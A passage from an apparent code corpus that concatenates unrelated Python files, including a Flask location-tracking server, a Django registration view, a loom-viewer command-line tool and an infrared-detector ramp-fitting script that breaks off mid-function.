layer = xml.find('{' + NAMESPACE + '}g')
layer.set('fill', color)
for path in layer.findall('{' + NAMESPACE + '}path'):
path.set('stroke', color)
path.set('stroke-width', str(10))
transform.append(layer)
return ET.tostring(svg, encoding='unicode')
@aiowrap
def generate_svg(tiles, dimension, terrain, objects, player_colors, corners=0, squareness=3, scale=1000): # pylint: disable=too-many-arguments
"""Generate map SVG."""
layers = {}
from collections import defaultdict
x = defaultdict(int)
y = {}
for i, tile in enumerate(tiles):
color = terrain[tile['terrain_id']][get_slope(tiles, dimension, i)]
x[tile['terrain_id']] += 1
y[tile['terrain_id']] = color
if color not in layers:
layers[color] = new_canvas(dimension)
layers[color][tile['y']][tile['x']] = '1'
#for t, c in x.items():
# print(t, c, y[t])
for color in list(player_colors.values()) + CONSTANT_COLORS:
layers[color] = new_canvas(dimension)
for obj in objects:
if obj['player_number'] is not None and obj['class_id'] in [70, 80]:
color = player_colors[obj['player_number']]
layers[color][int(obj['y'])][int(obj['x'])] = '1'
if obj['object_id'] in TC_IDS:
for i in range(-1, 2):
for j in range(-1, 2):
layers[color][int(obj['y']) + i][int(obj['x']) + j] = '1'
elif obj['object_id'] in [88, 793]:
for i in range(-1, 2):
layers[color][int(obj['y']) + i][int(obj['x'])] = '1'
elif obj['object_id'] in [64, 789]:
for i in range(-1, 2):
layers[color][int(obj['y'])][int(obj['x']) + i] = '1'
else:
for object_ids, color in OBJECT_MAPPING:
if obj['object_id'] in object_ids:
layers[color][int(obj['y'])][int(obj['x'])] = '1'
break
return trace(layers, dimension, corners, squareness, scale)
| 36.609023 | 142 | 0.59047 |
c9050ca554b19fd1e3228026b793070703e19ae1 | 150 | py | Python | NewspaperSpider/NewspaperSpider/items.py | sidharthk9/NewspaperScraper | 9a8d608c55cc6fdfa6492d2ca58739066d65b16e | [
"Unlicense"
] | null | null | null | NewspaperSpider/NewspaperSpider/items.py | sidharthk9/NewspaperScraper | 9a8d608c55cc6fdfa6492d2ca58739066d65b16e | [
"Unlicense"
] | null | null | null | NewspaperSpider/NewspaperSpider/items.py | sidharthk9/NewspaperScraper | 9a8d608c55cc6fdfa6492d2ca58739066d65b16e | [
"Unlicense"
] | null | null | null | import scrapy
from scrapy.item import Field
class TitleItem(scrapy.Item):
heading = Field()
class LinkItem(scrapy.Item):
article = Field() | 15 | 29 | 0.72 |
c90520de032ac5944e1b5e55e1cdb770212939a5 | 3,526 | py | Python | Application/views.py | gdimitris/FleetManagerBackend | 1a5f0c26a4279894b6ed6507cf729f88502d0883 | [
"MIT"
] | null | null | null | Application/views.py | gdimitris/FleetManagerBackend | 1a5f0c26a4279894b6ed6507cf729f88502d0883 | [
"MIT"
] | null | null | null | Application/views.py | gdimitris/FleetManagerBackend | 1a5f0c26a4279894b6ed6507cf729f88502d0883 | [
"MIT"
] | 1 | 2020-05-05T05:42:00.000Z | 2020-05-05T05:42:00.000Z | import os
from datetime import datetime
from flask import render_template, request, jsonify, send_from_directory, url_for
from Application import app, db
from Application.db_operations import update_researcher_timestamp, insert_location_point_in_db, \
insert_or_update_existing_researcher, get_all_researchers_from_db, get_entries_with_phone_id, \
get_filtered_entries_from_db, get_locations_for_phone_ids
@app.errorhandler(404)
def not_found(error):
message = "Page not found: %s \n Reason: %s" % (request.path, error)
app.logger.error(str(message))
return render_template('error.html', message=message), 404
@app.errorhandler(500)
@app.errorhandler(502)
def internal_error(error):
db.session.rollback()
message = "Internal server error: %s" % error
app.logger.error(message)
return render_template('error.html', message=message), 500
@app.errorhandler(Exception)
def unhandled_exception(e):
db.session.rollback()
message = "Unhandled exception: %s" % e
app.logger.error(message)
return render_template('error.html', message=message), 500
@app.route('/content/current_version.apk', methods=['GET'])
def get_apk():
return send_from_directory(os.path.join(app.root_path, 'static/resources'), 'app-working.apk',
mimetype='application/vnd.android.package-archive')
@app.route('/json/current_apk_version', methods=['GET'])
def get_version():
text_file = open('static/resources/current_apk_version.txt')
version = text_file.readline()
apk_url = url_for('get_apk', _external=True)
return jsonify(version=version, url=apk_url)
@app.route('/', methods=['GET', 'POST'])
def root():
researchers = get_all_researchers_from_db()
return render_template('users.html', researchers=researchers)
@app.route('/<device_id>', methods=['GET'])
def show_device_locations(device_id):
return render_template('index.html', device_id=device_id)
@app.route('/<device_id>', methods=['POST'])
def add_entry(device_id):
lat = request.args.get('lat')
lon = request.args.get('lon')
timestamp = request.args.get('time')
time = datetime.now().fromtimestamp(float(timestamp))
insert_location_point_in_db(device_id, lat, lon, time)
update_researcher_timestamp(device_id, time)
return render_template("empty.html"), 200
@app.route('/json/<device_id>', methods=['GET'])
def get_entries(device_id):
entries = get_entries_with_phone_id(device_id)
return jsonify(result=entries)
@app.route('/json/<device_id>/filtered', methods=['GET'])
def get_filtered_entries(device_id):
start_unix_time = request.args.get('start')
end_unix_time = request.args.get('end')
entries = get_filtered_entries_from_db(device_id, start_unix_time, end_unix_time)
return jsonify(result=entries)
@app.route('/<device_id>/register_full_name', methods=['GET', 'POST'])
def register_researcher(device_id):
name = request.args.get('name')
surname = request.args.get('surname')
insert_or_update_existing_researcher(device_id, name, surname)
return render_template("empty.html"), 200
@app.route('/multiselect_users', methods=['POST'])
def multiselect_users():
selected = request.form.getlist("check")
print "Result: %s" % selected
print "Selected researchers: %s" % len(selected)
res = get_locations_for_phone_ids(selected)
entries = jsonify(locations=res)
return render_template("multiple_users.html", result=entries.data)
if __name__ == '__main__':
app.run()
| 33.903846 | 99 | 0.731707 |
c905ade7488a7156992eba8440fe0b587bb04770 | 347 | py | Python | app/app.py | JulesGrd/Twitter-Dog-Bot | d0b8a12afbf7ca1c42c540032d1ad9ff5681701b | [
"MIT"
] | 2 | 2021-10-08T21:43:44.000Z | 2021-10-08T22:19:22.000Z | app/app.py | JulesGrd/Twitter-Dog-Bot | d0b8a12afbf7ca1c42c540032d1ad9ff5681701b | [
"MIT"
] | 1 | 2021-11-07T20:07:53.000Z | 2021-11-07T20:07:53.000Z | app/app.py | JulesGrd/Twitter-Dog-Bot | d0b8a12afbf7ca1c42c540032d1ad9ff5681701b | [
"MIT"
] | 1 | 2021-11-07T18:05:19.000Z | 2021-11-07T18:05:19.000Z | import tweepy
import dog
from postDog import postDog
from config import data
if __name__ == '__main__':
auth = tweepy.OAuthHandler(data["OAUTH_HANDLER_1"], data["OAUTH_HANDLER_2"])
auth.set_access_token(data["API_KEY_1"], data["API_KEY_2"])
api = tweepy.API(auth)
dogPic = dog.getDog(filename='assets/doggy')
postDog(api)
| 21.6875 | 80 | 0.717579 |
c906663e816567788a872d79ad4e2f03fb4244fb | 12,019 | py | Python | python/loom_viewer/loom_cli.py | arao11/pattern_viz | 3123f19a127c9775fadcca25f83aebfc8dc3b9f9 | [
"BSD-2-Clause"
] | 34 | 2017-10-18T06:09:16.000Z | 2022-03-21T18:53:16.000Z | python/loom_viewer/loom_cli.py | arao11/pattern_viz | 3123f19a127c9775fadcca25f83aebfc8dc3b9f9 | [
"BSD-2-Clause"
] | 52 | 2017-10-19T13:35:39.000Z | 2021-06-03T08:54:55.000Z | python/loom_viewer/loom_cli.py | arao11/pattern_viz | 3123f19a127c9775fadcca25f83aebfc8dc3b9f9 | [
"BSD-2-Clause"
] | 6 | 2018-05-28T06:16:26.000Z | 2020-08-17T11:49:34.000Z | #!/usr/bin/env python
# Copyright (c) 2016 Sten Linnarsson
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from typing import *
from mypy_extensions import NoReturn
import sys
import os
import argparse
import logging
import warnings
import loompy
from ._version import __version__
from .loom_expand import LoomExpand
from .loom_datasets import def_dataset_dir, LoomDatasets
from .loom_server import start_server
class VerboseArgParser(argparse.ArgumentParser):
def error(self, message: str) -> NoReturn:
self.print_help()
sys.stderr.write("\nerror: %s\n" % message)
sys.exit(2)
def tile_command(
datasets: LoomDatasets,
filenames: List[str],
projects: List[str],
all_files: bool,
truncate: bool) -> None:
# do not expand tiles more than once for any given filename
matches = set() # type: Set[Tuple[str, str, str]]
filenamesNone = filenames is None
projectsNone = projects is None
logging.warn("""
%s
%s
""" % (filenamesNone, projectsNone))
if all_files:
matches = datasets.list.all_files()
else:
if filenames is not None:
for filename in filenames:
matches |= datasets.list.matching_filenames(filename)
if projects is not None:
for project in projects:
matches |= datasets.list.files_in_project(project)
if not matches:
logging.warn("""
Must explicitly state what to tile! See also:
loom tile --help
To generate tiles for every loom file in the default dataset folder, type:
loom tile --all
To use a different dataset path, use `--dataset-path DATASET_PATH`. Note that
this must be put before the tile command:
loom --dataset-path DATASET_PATH tile [input for tile command]
To generate tiles for any loom file in the default dataset folder that matches
the names of FILE1, FILE2, etc, type:
loom tile FILE1 FILE2
To replace old tiles with new ones, add the -t or --truncate flag
loom tile FILE -t
To generate tiles only for one specific file, even if there are multiple files
with the same name, use the absolute path:
loom tile /path/to/FILE1 FILE2
To tile all files in one or more project folders, type:
loom tile --project PROJECT1 PROJECT2
Combining file and project paths is possible:
loom /path/to/FILE1 FILE2 --project PROJECT
Putting it all together: the following points to a non-default dataset path,
and generates tiles for one specific FILE, as well as all files in PROJECT,
while discarding any previously generated tiles:
loom --dataset-path DATASET_PATH tile /path/to/FILE --project PROJECT -t
""")
else:
for project, filename, file_path in matches:
logging.info("Tiling {file_path}")
datasets.tile(project, file_path, truncate)
def expand_command(
datasets: LoomDatasets,
filenames: List[str],
projects: List[str],
all_files: bool,
clear: bool,
metadata: bool,
attributes: bool,
rows: bool,
cols: bool,
truncate: bool) -> None:
if not (clear or metadata or attributes or rows or cols):
logging.warn("""
`loom expand` pre-generates cache for the loom-viewer, for faster serving.
This is a slow process, so that the command requires that you explicitly state
which cache to generate ("expand"), and for which loom file(s).
See also:
loom expand --help
Currently, the following separate types of cache can be expanded with these flags:
-m, --metadata general metadata
-a, --attributes row and column attributes
-r, --rows rows (genes)
-c, --cols columns (cells, currently not used)
In the following examples, we will expand metadata, attributes and all rows
all at once via -mar.
To expand all loom files matching the name FILE1, FILE2, etc in the default
loom datasets folder, type:
loom expand FILE1 FILE2 -mar
To expand a specific file, even if there are multiple files
with the same name, use the absolute path:
loom tile /path/to/FILE1 FILE2
To use a different dataset path, use `--dataset-path DATASET_PATH`. Note that
this must be put before the tile command:
loom --dataset-path DATASET_PATH expand FILE -mar
To apply expansion to all loom files, use --all or -A:
loom expand -marA
To apply expansion to all loom files in one or more project folders, type:
loom expand --project PROJECT1 PROJECT2 -mar
By default, previously expanded metadata is left alone. To force replacing this
expanded data, use --truncate or -t:
loom expand FILE -marT
To remove ALL previously generated cache (except tiles), use --clear or -C
loom expand FILE -C
Putting it all together: the following points to a non-default dataset path,
finds one specific FILE, as well as all files in PROJECT. For these files,
any existing expanded metadata is first deleted, then new general metadata and
attributes are expanded (but not rows)
while discarding any previously generated tiles:
loom --dataset-path DATASET_PATH expand /path/to/FILE --project PROJECT -maC
""")
return
matches = set() # type: Set[Tuple[str, str, str]]
if all_files:
matches = datasets.list.all_files()
else:
for filename in filenames:
matches |= datasets.list.matching_filenames(filename)
for project in projects:
matches |= datasets.list.files_in_project(project)
for project, filename, file_path in matches:
try:
expand = LoomExpand(project, filename, file_path)
if not expand.closed:
if clear:
expand.clear_metadata()
expand.clear_attributes()
expand.clear_rows()
expand.clear_columns()
if metadata:
expand.metadata(truncate)
if attributes:
expand.attributes(truncate)
if rows:
expand.rows(truncate)
if cols:
expand.columns(truncate)
expand.close()
except Exception as e:
expand.close()
raise e
def parse_args(def_dir: str) -> Any:
parser = VerboseArgParser(description="Loom command-line tool.")
parser.add_argument(
"--debug",
action="store_true",
help="Show verbose debug output (False by default)"
)
parser.add_argument(
"--dataset-path",
help="Path to datasets directory (default: %s)" % def_dir,
nargs='?',
const=def_dir,
default=def_dir
)
subparsers = parser.add_subparsers(title="subcommands", dest="command")
# loom version
version_parser = subparsers.add_parser("version", help="Print version")
# loom server
server_parser = subparsers.add_parser(
"server",
help="Launch loom server (default command)"
)
server_parser.add_argument(
"--show-browser",
help="Automatically launch browser (False by default)",
action="store_true"
)
server_parser.add_argument(
"-p",
"--port",
help="Port",
type=int,
nargs='?',
const=8003,
default=8003
)
# loom tile
tile_parser = subparsers.add_parser("tile", help="Precompute heatmap tiles")
tile_parser.add_argument(
"file",
help="""Loom file(s) to expand.
Expands all files matching the provided file names.
To avoid this, use an absolute path to specify a single file.
""",
nargs='*',
)
tile_parser.add_argument(
"--project",
help="Project(s) for which to expand all files.",
nargs='*',
)
tile_parser.add_argument(
"-A",
"--all",
help="Expand all loom files.",
action="store_true"
)
tile_parser.add_argument(
"-t",
"--truncate",
help="Remove previously expanded tiles if present (false by default)",
action="store_true"
)
# loom expand
expand_help = "Expands data to compressed json files. Processes all matching loom filenames in dataset_path, unless absolute path is passed"
expand_parser = subparsers.add_parser(
"expand",
help=expand_help
)
expand_parser.add_argument(
"file",
help="""Loom file(s) to expand.
Expands all files matching the provided file names.
To avoid this, use an absolute path to specify a single file.
When combined with --clear it clears all expanded files instead.
""",
nargs='*',
)
expand_parser.add_argument(
"--project",
help="Project(s) for which to expand all files (or clear expansion with --clear).",
nargs='*',
)
expand_parser.add_argument(
"-A",
"--all",
help="Expand all loom files (or clear expansion with --clear).",
action="store_true"
)
expand_parser.add_argument(
"-C",
"--clear",
help="Remove previously expanded files.",
action="store_true"
)
expand_parser.add_argument(
"-t",
"--truncate",
help="Replace previously expanded files if present (false by default). Only does something in combination with expansion (-m, -a, -r or -c).",
action="store_true"
)
expand_parser.add_argument(
"-m",
"--metadata",
help="Expand metadata (false by default)",
action="store_true"
)
expand_parser.add_argument(
"-a",
"--attributes",
help="Expand attributes (false by default)",
action="store_true"
)
expand_parser.add_argument(
"-r",
"--rows",
help="Expand rows (false by default)",
action="store_true"
)
expand_parser.add_argument(
"-c",
"--cols",
help="Expand columns (false by default)",
action="store_true"
)
return parser.parse_args()
def main() -> None:
def_dir = def_dataset_dir()
# Create a fake args object with default settings
# to handle the special case of no arguments.
if len(sys.argv) == 1:
args = argparse.Namespace()
setattr(args, "debug", False)
setattr(args, "dataset_path", def_dir)
# handled below
# setattr(args, "port", 8003)
# setattr(args, "command", "server")
# setattr(args, "show_browser", True)
else:
args = parse_args(def_dir)
if args.debug:
logging.basicConfig(
level=logging.DEBUG, format="%(asctime)s - %(levelname)s - %(module)s, %(lineno)d - %(message)s")
else:
logging.basicConfig(level=logging.INFO, format="%(asctime)s - %(message)s")
# If only --debug or --dataset-path is passed,
# we still want to default to the server command
if 'command' not in args:
setattr(args, "command", "server")
if 'port' not in args:
setattr(args, "port", 8003)
if 'show_browser' not in args:
setattr(args, "show_browser", True)
if args.debug:
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s - %(module)s, %(lineno)d: %(message)s')
else:
logging.basicConfig(level=logging.INFO, format='%(asctime)s: %(message)s')
if args.command == "version":
print("loom v%s" % __version__)
sys.exit(0)
else:
if args.command == "tile":
logging.warn("test")
datasets = LoomDatasets(args.dataset_path)
tile_command(datasets, args.file, args.project, args.all, args.truncate)
elif args.command == "expand":
datasets = LoomDatasets(args.dataset_path)
expand_command(datasets, args.file, args.project, args.all, args.clear, args.metadata, args.attributes, args.rows, args.cols, args.truncate)
else: # args.command == "server":
start_server(args.dataset_path, args.show_browser, args.port, args.debug)
if __name__ == "__main__":
main()
| 26.473568 | 144 | 0.719611 |
c907566de3410b8c828deb59e531487549202dc6 | 1,260 | py | Python | test_function.py | will-huynh/process_controller | e193c80976ef1d35fb9e661425bf609a86a313c8 | [
"MIT"
] | 1 | 2021-12-25T04:08:53.000Z | 2021-12-25T04:08:53.000Z | test_function.py | will-huynh/process_controller | e193c80976ef1d35fb9e661425bf609a86a313c8 | [
"MIT"
] | null | null | null | test_function.py | will-huynh/process_controller | e193c80976ef1d35fb9e661425bf609a86a313c8 | [
"MIT"
] | null | null | null | import logging
import tcp_log_socket
logging_socket = tcp_log_socket.local_logging_socket(__name__)
logger = logging_socket.logger
#Test method simulating a method with required arguments; division is used to test exception handling
def test_args(div1, div2):
logger.info("Simulating a method with arguments and exceptions.")
quotient = div1 / div2
logger.info("Quotient is: {}".format(quotient))
return quotient
#Test method simulating a method with no required arguments
def test_no_args():
result = True
logger.info("Simulating methods without arguments.")
logger.info("Expected result: {}.".format(result))
return result
#Test method simulating an argument with keyworded and optional arguments
def test_keyword(def_num=10, **kwargs):
logger.info("Simulating methods with optional and keyworded arguments.")
allowed_key = "key"
value = False
list_keys = list(kwargs.keys())
logger.info("Default argument is {}.".format(def_num))
for kw in list_keys:
if kw == allowed_key:
logger.info("Keyword found.")
value = kwargs.pop(kw)
logger.info("Keyword and value are {0} : {1}.".format(kw, value))
return (def_num, value)
| 37.058824 | 102 | 0.692857 |
c908908fcda77dbed54b6f285d7d03c69d799dc0 | 3,154 | py | Python | users/views.py | elvinaqa/Amazon-Review-Analyzer-Summarizer-Python-NLP-ML- | 6c70e84ffbcb8c8fd65a7fe0847e1f0eb779f759 | [
"Unlicense"
] | 1 | 2020-09-10T11:26:05.000Z | 2020-09-10T11:26:05.000Z | users/views.py | elvinaqa/Amazon-Review-Analyzer-Summarizer-Python-NLP-ML- | 6c70e84ffbcb8c8fd65a7fe0847e1f0eb779f759 | [
"Unlicense"
] | null | null | null | users/views.py | elvinaqa/Amazon-Review-Analyzer-Summarizer-Python-NLP-ML- | 6c70e84ffbcb8c8fd65a7fe0847e1f0eb779f759 | [
"Unlicense"
] | null | null | null | from django.shortcuts import render, redirect
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from .forms import UserRegisterForm, UserUpdateForm, ProfileUpdateForm
#####################################################################
from django.http import HttpResponse
from django.contrib.auth import login, authenticate
from .forms import UserRegisterForm
from django.contrib.sites.shortcuts import get_current_site
from django.utils.encoding import force_bytes, force_text
from django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode
from django.template.loader import render_to_string
from .tokens import account_activation_token
from django.contrib.auth.models import User
from django.core.mail import EmailMessage
def register(request):
if request.method == 'POST':
form = UserRegisterForm(request.POST)
if form.is_valid():
user = form.save(commit=False)
user.is_active = False
user.save()
current_site = get_current_site(request)
mail_subject = 'Activate your account.'
message = render_to_string('acc_active_email.html',{
'user':user,
'domain': current_site.domain,
'uid':urlsafe_base64_encode(force_bytes(user.pk)),
'token':account_activation_token.make_token(user),
})
to_email = form.cleaned_data.get('email')
email = EmailMessage(
mail_subject, message, to=[to_email]
)
email.send()
return render(request, 'users/activation_info.html')
else:
form = UserRegisterForm()
return render(request, 'users/register.html', {'form': form})
@login_required
def profile(request):
if request.method == 'POST':
u_form = UserUpdateForm(request.POST, instance=request.user)
p_form = ProfileUpdateForm(request.POST,
request.FILES,
instance=request.user.profile)
if u_form.is_valid() and p_form.is_valid():
u_form.save()
p_form.save()
messages.success(request, f'Your account has been updated!')
return redirect('profile')
else:
u_form = UserUpdateForm(instance=request.user)
p_form = ProfileUpdateForm(instance=request.user.profile)
context = {
'u_form': u_form,
'p_form': p_form,
}
return render(request, 'users/profile.html', context)
def activate(request, uidb64, token):
try:
uid = urlsafe_base64_decode(uidb64).decode()
user = User.objects.get(pk=uid)
except(TypeError, ValueError, OverflowError, User.DoesNotExist):
user = None
if user is not None and account_activation_token.check_token(user, token):
user.is_active = True
user.save()
login(request, user)
# return redirect('home')
return render(request,'analyzer/home.html',{'message1':'Succesfull'})
else:
return render(request,'users/email_confirm_complete.html',{'message1':'Failed'})
| 38.463415 | 88 | 0.642676 |
c909851fe73dcfad421fb6354ea395215029d6a8 | 689 | py | Python | tests/test-vext-pth.py | NomAnor/vext | adea4b593ae4c82da0965ec1addaa1cd6d5b396c | [
"MIT"
] | 62 | 2015-03-25T15:56:38.000Z | 2021-01-07T21:32:27.000Z | tests/test-vext-pth.py | NomAnor/vext | adea4b593ae4c82da0965ec1addaa1cd6d5b396c | [
"MIT"
] | 73 | 2015-02-13T16:02:31.000Z | 2021-01-17T19:35:10.000Z | tests/test-vext-pth.py | NomAnor/vext | adea4b593ae4c82da0965ec1addaa1cd6d5b396c | [
"MIT"
] | 8 | 2016-01-24T16:16:46.000Z | 2020-09-23T17:56:47.000Z | import os
import unittest
from vext.install import DEFAULT_PTH_CONTENT
class TestVextPTH(unittest.TestCase):
# Preliminary test, that verifies that
def test_can_exec_pth_content(self):
# Stub test, verify lines starting with 'import' in the pth can
# be exec'd and doesn't raise any exceptions.
# TODO, mock file.write and get content directly from create_pth
# instead of getting it directly from DEFAULT_PTH_CONTENT
lines = DEFAULT_PTH_CONTENT.splitlines()
for line in lines:
if line.startswith("import ") or line.startswith("import\t"):
exec(line)
if __name__ == "__main__":
unittest.main()
| 28.708333 | 73 | 0.683599 |
c9098d28bd2a0a51fc33c4cd5fecc41dc7fc38ec | 2,196 | py | Python | stats/monitor.py | pawankaushal/crossbar-examples | b6e0cc321bad020045c4fafec091f78abd938618 | [
"Apache-2.0"
] | 97 | 2016-12-14T16:48:49.000Z | 2021-09-12T17:48:10.000Z | stats/monitor.py | pawankaushal/crossbar-examples | b6e0cc321bad020045c4fafec091f78abd938618 | [
"Apache-2.0"
] | 38 | 2016-12-13T09:42:38.000Z | 2020-07-05T11:58:07.000Z | stats/monitor.py | pawankaushal/crossbar-examples | b6e0cc321bad020045c4fafec091f78abd938618 | [
"Apache-2.0"
] | 118 | 2016-12-12T21:36:40.000Z | 2021-11-17T11:49:33.000Z | import argparse
from pprint import pformat
import txaio
txaio.use_twisted()
from autobahn.twisted.wamp import ApplicationSession, ApplicationRunner
class ClientSession(ApplicationSession):
async def onJoin(self, details):
print('MONITOR session joined: {}'.format(details))
xbr_config = self.config.extra['xbr']
# {'market-url': '', 'market-realm': '', 'delegate-key': '../.xbr.key'}
print(xbr_config)
def on_session_join(session_details):
self.log.info('>>>>>> MONITOR : session joined\n{session_details}\n',
session_details=pformat(session_details))
await self.subscribe(on_session_join, 'wamp.session.on_join')
def on_session_stats(session_details, stats):
self.log.info('>>>>>> MONITOR : session stats\n{session_details}\n{stats}\n',
session_details=pformat(session_details), stats=pformat(stats))
await self.subscribe(on_session_stats, 'wamp.session.on_stats')
def on_session_leave(session_id):
self.log.info('>>>>>> MONITOR : session {session_id} left',
session_id=session_id)
await self.subscribe(on_session_leave, 'wamp.session.on_leave')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-d',
'--debug',
action='store_true',
help='Enable debug output.')
parser.add_argument('--url',
dest='url',
type=str,
default="ws://localhost:8080/ws",
help='The router URL (default: "ws://localhost:8080/ws").')
parser.add_argument('--realm',
dest='realm',
type=str,
default="realm1",
help='The realm to join (default: "realm1").')
args = parser.parse_args()
if args.debug:
txaio.start_logging(level='debug')
else:
txaio.start_logging(level='info')
runner = ApplicationRunner(url=args.url, realm=args.realm)
runner.run(ClientSession, auto_reconnect=True)
| 31.826087 | 89 | 0.583789 |
c90c7861eaff4add66e4d61ef78a76a073959d73 | 29,349 | py | Python | spirou/sandbox/fits2ramp.py | clairem789/apero-utils | 68ed0136a36b6badeaf15eb20d673052ad79a949 | [
"MIT"
] | 2 | 2020-10-08T17:03:45.000Z | 2021-03-09T17:49:44.000Z | spirou/sandbox/fits2ramp.py | clairem789/apero-utils | 68ed0136a36b6badeaf15eb20d673052ad79a949 | [
"MIT"
] | 17 | 2020-09-24T17:35:38.000Z | 2020-12-11T16:10:13.000Z | spirou/sandbox/fits2ramp.py | clairem789/apero-utils | 68ed0136a36b6badeaf15eb20d673052ad79a949 | [
"MIT"
] | 5 | 2020-04-10T06:41:00.000Z | 2020-12-16T21:09:14.000Z | #!/usr/bin/env python2.7
# Version date : Aug 21, 2018
#
# --> very minor correction compared to previous version. As keywords may change in files through time, when we delete
# a keyword, we first check if the keyword is preseent rather than "blindly" deleting it
# --> also corrected integer vs float divisions in refpixcor. This ensures python3 compatibility
#
# Version date : May 29, 2018
#
# --> The first frame is used as a "bias" for all subsequent readouts
# Subsequent frames are corrected for reference pixels
# This significantly improves the quality of the error measurement
# --> The top/bottom reference pixels are always corrected in odd/even manner, not as a constant offset for odd/even columns
# --> We now perform the non-linearity measurement
# --> All the "print" statement have been made consistent with the python3
# --> Add the "selfbias" keyword. This option uses the 1st readout as a bias estimate. This allows ref pixel correction per frame
#
# Version date : Mar 23, 2018
#
# --> corrects an error in the ref pixels
# --> Nothing changed to the input syntax compared to previous versions
#
# - accepts both H2RG and H4RG data. The size of the images is determined
# from the calibration files given in input, avoiding hardcoding the size
# of the input images. I removed all references to dim1 and dim2 (x and y size of
# images) as we will always have square images. This is now simply imdim. Imdim can
# only be equal to 2048 or 4096. If not, then something is really wrong and the code exits
# with a message.
#
# - uses pixels on the side of the array and not only top/bottom ones
# filters 1/f noise with side pixels. Important for the H4RG data
#
# - ramp algorithm significantly faster as we took some variable handling out the big loop. Does not
# change the output values in the end. sx and sx2 are now determined only at the end of the
# loop on image by using the timestamp vector combined with the n variable. Saves ~0.5s per readout
#
# - medians are now handling nans properly; avoids problems in rare cases when a nan appears in the
# ref pixel region. nanmedian exists in python3 but not python2, so I defined the function
# here. When we'll switch to p3, we can simply delete this function and we won't
# need to modify the code itself. We'll juste need : import numpy.nanmedian as nanmedian
#
# - if the bias frame is set entirely to zero (mostly for debugging purpose), then we avoid
# subtracting zeros to the entire image and save ~0.1s per image.
#
# - ref pixel filtering is defined as a function. This was done at two places in the
# code.
#
# - the reference pixel function is much faster thanks to some more clever handling
# of variables.
#
# - the flux in the "mask" region used now uses np.nanmean instead of mean. This avoids
# having a NaN flux measurement in the posemeter. It also avoids problems when writing
# the posemeter values in the header as one cannot have a NaN as a keyword value.
#
# - we now have an ascii output per iteration that tell you how long each frame took to
# process and how long is left before the end of the big loop. On our machine, the
# average for an H2RG image with the "-noerror" keyword (faster) is slightly less than
# 1 s per image.
#
#
# Now includes the following options :
#
# -n=XXX -> Will only perform the ramp fitting on the first XXX readouts of the array
# This can be used to simulate a shorter sequence. This could be useful to get the
# dark that exactly matches the integration time of a given science sequence. Say you
# have a dark of 100 frames but a science sequence of 20 frames, you may want to only use
# the first 20 frames of the dark to get exactly the same statistical properties as in your
# science sequence.
# -cube -> set this to get an output cube with all readouts. Use only if you want to examine the readouts.
# -linearize -> corrects for non-linearity. Do not use this keyword to speed things up. We don't have the liearity coefficients in hand anyway
# -noerror -> do not compute the error on slope. This seeds-up the code as we need to read the images only once.
# -noref -> Skip all reference pixel corrections entirely
# -selfbias -> subtract the 1st readout from all subsequent readouts to allow ref pixel correction per frame
# -*- coding: utf-8 -*-
from scipy import stats
import numpy as np
from array import *
import glob
import os
# import pyfits --> rendered obsolete by the use of the more recent astropy.io.fits
import time
import sys
import scipy.ndimage.filters
from astropy.io import fits as pyfits
from scipy.stats.stats import pearsonr
def nanmedian(data):
# this function returns the median of finite values within
# a vector. This is for python2 only and we will replace by
# the python3 version np.nanmedian that does exactly the same
# thing. When swithing to python3, we will simply add :
#
# import np.nanmedian as nanmedian
#
# and it should be completely transparent for the rest of the code.
#
data2=np.asarray(data)
g=np.isfinite(data2)
if np.max(g)==False:
return(np.nan)
return(np.median(data2[g]))
def refpixcorr(im,oddeven=False):
# function that corrects with reference pixels on the sides of the H2RG and H4RG.
#
# On the periphery of the arrays, there are 4 pixels that are not light-sensitive
# and that track drifts in the amplifiers. These are reference pixels and they can
# reduce the effective readout noise by a factor of at least 2 if properly used.
#
# The top and bottom pixels of each output (one of 32 vertical "ribbons") see the
# start and end of each readout. To filter noise on a readout timescale, we measure
# the median of the top and bottom reference pixels. We then define a "slope"
# (matrix y_frac) that forces interpolates the gradient through the light-sensitive
# pixels.
#
# For some arrays (e.g., the H2RG used for the AT4), the odd and even pixels within
# each amplifier differ in behaviour. We therefore measure and correct this "slope"
# independently for odd and even pixels. This is done by setting oddeven=True in the
# function call. The default is oddeven=False
#
# The side (x=0-3 and x=N-3:N) of the HxRG arrays see the "faster" 1/f noise that
# affects all amplifier. We therefore need to subtract the mean of the side reference
# pixels to remove (most of) the 1/f noise. As the reference pixels are themselves
# noisy, we apply a median filter to these pixels before subtracting.
# The size of this running median filter is set with the "medfilterwidth"
# variable.
#
imdim=(np.shape(im))[0]
# x position of the side deference pixels
ref_sides = [0, 1, 2, 3,imdim - 4, imdim - 3, imdim - 2, imdim - 1]
# filtering with ref pixels on either side of image
medfilterwidth = 15 # value used for JWST H2RGs. Could be modified
ref=np.zeros(imdim) # contains the median-filter, mean value of the vertical ref pixels
for xpix in ref_sides:
